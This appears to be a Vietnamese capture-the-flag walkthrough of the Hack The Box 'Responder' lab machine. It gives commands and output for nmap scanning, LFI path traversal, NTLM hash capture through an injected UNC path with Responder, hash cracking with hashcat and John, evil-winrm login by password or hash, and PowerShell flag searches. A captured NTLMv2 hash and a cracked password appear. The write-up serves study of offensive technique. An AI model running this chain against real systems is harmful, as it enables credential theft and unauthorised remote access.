Skip to main content

Kinh nghiệm exploit - bài 1

Scanning

lika@learning:~/Downloads$ cnmap -sC -sV -T4 10.129.14.123
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 13:24 +07
Nmap scan report for 10.129.14.123
Host is up (0.32s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.51 seconds
lika@learning:~/Downloads$ whatweb 10.129.14.123
http://10.129.14.123 [200 OK] Apache[2.4.52], Country[RESERVED][ZZ], HTTPServer[Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1], IP[10.129.14.123], Meta-Refresh-Redirect[http://unika.htb/], OpenSSL[1.1.1m], PHP[8.1.1], X-Powered-By[PHP/8.1.1]

Xem kĩ victim đang dùng gì

  1. Window -> sẽ có đường dẫn ở các folder nào (C:/Users chẳng hạn)
  2. Linux -> /etc/paswd ?

Port 80 thì vào web check, nếu có login thử dùng sql injection hoặc brute force, hoặc burp suite Chưa có thông tin thì sau nmap dùng dirb hoặc gobuster hoặc ffuf để scan lấy folder Từ folder tìm thêm thông tin Nếu webpage xài php mà có param = ? nên thử dùng path traverser hoặc LFI Link : https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt

Lúc này phát hiện victim dùng được path traverser -> Thử `

../../../../../../../../windows/system32/drivers/etc/hosts

Thành công, biết được có thể command injection ở server Về attack machine, dùng responsder để capture network Posoining NTML, khi máy victim gọi 1 network bị sai Giả sủ ip của máy Attack là 10.12.126.1 trên victim gọi

$IP$index.php?page=\\10.10.12.126\\test

Ở responsder nhận được hash

Administrator::RESPONDER:e6f24786588c8c34:8B120F650E8D782CC0CAAD0BABA53C83:01010000000000000085F3BFFD4FDC0117A2B27ADC9782EA00000000020008005A0056004A00450001001E00570049004E002D003800410038004E0059004500360056004C004D00550004003400570049004E002D003800410038004E0059004500360056004C004D0055002E005A0056004A0045002E004C004F00430041004C00030014005A0056004A0045002E004C004F00430041004C00050014005A0056004A0045002E004C004F00430041004C00070008000085F3BFFD4FDC01060004000200000008003000300000000000000001000000002000000F3907CD7421AE8F3405BA1052F053A8A1890420E20460C9493D275422EF22370A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00320031000000000000000000

Crack với hashmap

hashcat -m 5600 test.hash /usr/share/wordlists/rockyou.txt

Crack với john the ripper

lika@learning:~/Downloads$ cat ~/.john/john.pot
$pkzip$6*1*1*0*8*24*8759*a7409df1d7a76ad3809794d387209855bb7638aa589d5be62b9bf373d78055e1dd351925*1*0*8*24*1535*459926ee53809fa53fe26c3e4548cd7819791a638c8d96d3ec7cf18477ffa1e9e2e77944*1*0*8*24*834f*7d2cbe98180e5e9b8c31c5aec89c507011d26766981d17d249e5886e51ac03270b009d62*1*0*8*24*8d07*7d51a96d3e3fa4083bbfbe90ee97ddba1f39f769fcf1b2b6fd573fdca8c97dbec5bc9841*1*0*8*24*90ab*f7fe58aeaaa3c46c54524ee024bd38dae36f3110a07f1e7aba266acbf8b5ff0caf42e05e*2*0*2d*21*d9c379a9*9b9*46*0*2d*8ce8*aae40dfa55b72fd591a639c8c6d35b8cabd267f7edacb40a6ddf1285907b062c99ec6cc8b55d9f0027f553a44f*$/pkzip$:manuel

lika@learning:~/Downloads$ john -w=/usr/share/wordlists/rockyou.txt test.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
No password hashes left to crack (see FAQ)
ADMINISTRATOR::RESPONDER:e6f2478650000000000000:badminton

1.John ghi các password đã crack vào pot file (mặc định):

~/.john/john.pot

hoặc trong thư mục chạy john có file john.pot (tuỳ cài đặt / phiên bản).

2. Xem password đã crack (theo file hash)

Hiển thị kết quả (cracked + uncracked) từ file hash:

john --show path/to/hashfile

Chỉ hiển thị các account đã crack: kết quả in dạng user

:other fields
.

Xem trực tiếp nội dung pot file:

cat ~/.john/john.pot

Connect Win

Connect vào host bằng WinRM

evil-winrm -i 192.168.164.95 -u Administrator -H a51493b0b06e5e35f855245e71af1d14 -> hash

hoặc pass

evil-winrm -i 10.129.14.123 -u Administrator -p badminton

Kết nói và lấy proof

```java Title=info
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> users
The term 'users' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ users
+ ~~~~~
    + CategoryInfo          : ObjectNotFound: (users:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\Administrator\Documents>
^H^H
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami /groups


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ===============================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                                          Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288
*Evil-WinRM* PS C:\Users\Administrator\Documents> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
RESPONDER\Administrator

Tìm tiếp file flag.txt bằng lệnh

Get-ChildItem -Path C:\ -Filter flag.txt -Recurse -Force -File -ErrorAction SilentlyContinue |
    Select-Object FullName
Get-PSDrive -PSProvider FileSystem |
  ForEach-Object {
    Get-ChildItem -Path ($_.Root) -Filter flag.txt -Recurse -Force -File -ErrorAction SilentlyContinue
  } | Select-Object @{n='Drive';e={$_.PSDrive.Name}}, FullName

Get-PSDrive -PSProvider FileSystem | ForEach-Object {
  Get-ChildItem -Path ($_.Root) -Recurse -Force -File -Include flag.txt, FLAG.TXT, Flag.txt -ErrorAction SilentlyContinue
} | Select-Object FullName